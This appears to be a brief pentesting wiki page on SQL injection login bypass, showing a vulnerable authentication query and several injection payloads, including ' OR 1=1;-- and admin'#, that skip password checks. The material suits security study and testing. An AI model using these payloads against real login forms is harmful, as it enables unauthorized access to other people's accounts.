Authentication Bypass

This method consists of considering that the web application isn't interested in the content of the username and password, but in making a matching pair in the users' table.

We assume the database uses a basic query for authentication

SELECT * from users WHERE username='%user%' and password='%password%' LIMIT 1;

%user% and %password% are the values received on a login form

We can do a malicious insertion on the password field

'--   #Use this comparison to cheat on verification
' OR 1=1;--   #Another alternative
'+OR+1=1-- #Another alternative
#This will skip the password verification and enumerate all the users

Sometimes and extra space after ;-- could make it work

On PHP-based pages, we can replicate the same with a different payload

admin'#      //Insert this to skip the password verification

PreviousSQL Injection NextNoSQL Injection

Last updated 1 month ago